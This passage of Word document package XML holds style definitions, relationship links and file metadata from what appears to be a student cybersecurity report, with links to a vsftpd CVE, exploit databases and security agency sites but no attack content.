    <w:rsid w:val="00E459F0"/>
    <w:rsid w:val="00E65573"/>
    <w:rsid w:val="00E82E8E"/>
    <w:rsid w:val="00E97307"/>
    <w:rsid w:val="00EB08C5"/>
    <w:rsid w:val="00EB3ED5"/>
    <w:rsid w:val="00EE77A9"/>
    <w:rsid w:val="00EE784E"/>
    <w:rsid w:val="00F13500"/>
    <w:rsid w:val="00F13892"/>
    <w:rsid w:val="00F21AB7"/>
    <w:rsid w:val="00F22031"/>
    <w:rsid w:val="00F515F9"/>
    <w:rsid w:val="00F53546"/>
    <w:rsid w:val="00F5726E"/>
    <w:rsid w:val="00F64FBF"/>
    <w:rsid w:val="00F66E04"/>
    <w:rsid w:val="00F72589"/>
    <w:rsid w:val="00F74BE0"/>
    <w:rsid w:val="00F74EDE"/>
    <w:rsid w:val="00F82B7B"/>
    <w:rsid w:val="00F84130"/>
    <w:rsid w:val="00FC5E6E"/>
    <w:rsid w:val="00FE2BC4"/>
    <w:rsid w:val="00FE5704"/>
    <w:rsid w:val="00FF5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47981"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0A23DE42-62B2-4B69-BDC1-60369712C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0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70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70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70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70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70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0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0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0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0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70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70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70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70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70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0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0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0D4"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="004970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0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0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0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0D4"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="004970D4"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="004970D4"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="004970D4"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="004970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70D4"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="004970D4"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C17AB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C17ABC"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="003A4B7A"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002105FF"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002105FF"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00C934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A1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5C3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008A1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5C3"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="font-claude-response-body">
    <w:name w:val="font-claude-response-body"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00F515F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TMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F515F9"/>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hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2011-2523" TargetMode="External"/><Relationship Id="rId6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hyperlink" Target="https://attack.mitre.org/" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.enisa.europa.eu/"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hyperlink" Target="https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><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www.ncsc.gov.uk/" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.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hyperlink" Target="https://www.crowdstrike.com/" TargetMode="External"/><Relationship Id="rId7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hyperlink" Target="https://thereviewhive.blog/marks-spencer-cyberattack-recovery-timeline-impact/" TargetMode="External"/><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hyperlink" Target="https://learn.microsoft.com/" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/49757" TargetMode="External"/><Relationship Id="rId73"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webSettings" Target="webSettings.xml"/><Relationship Id="rId7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2a2be620da7c9b8d1a4dc35bb2178fd8">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="da3f2772-8f1e-4acb-bd98-3a0ee892f48a" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="6534fc434e01732e3932f55cc2075bff"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BillingMetadata"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BillingMetadata" ma:index="14" nillable="true" ma:displayName="MediaServiceBillingMetadata" ma:hidden="true" ma:internalName="MediaServiceBillingMetadata" ma:readOnly="true">
      <xsd:simpleType>
        <xsd:restriction base="dms:Note"/>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B519CA-4F61-44E3-8F58-3908A6802E46}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{E0A27835-A7FE-4DC4-9F52-8341A385FC0E}">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8B93145C-BC88-471E-AF8A-B0CD6DEE55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6525</TotalTime>
  <Pages>48</Pages>
  <Words>6269</Words>
  <Characters>35738</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Akteruzzman (2216724)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Muhammad Akteruzzman (2216724)</cp:lastModifiedBy>
  <cp:revision>186</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-11T02:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-21T08:45:00Z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c8ed79fd-85f0-427a-83c4-9040ba444d48</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ContentTypeId">
    <vt:lpwstr>0x01010060EEA2F366178047808FA03462A57F61</vt:lpwstr>
  </property>
</Properties>
</file>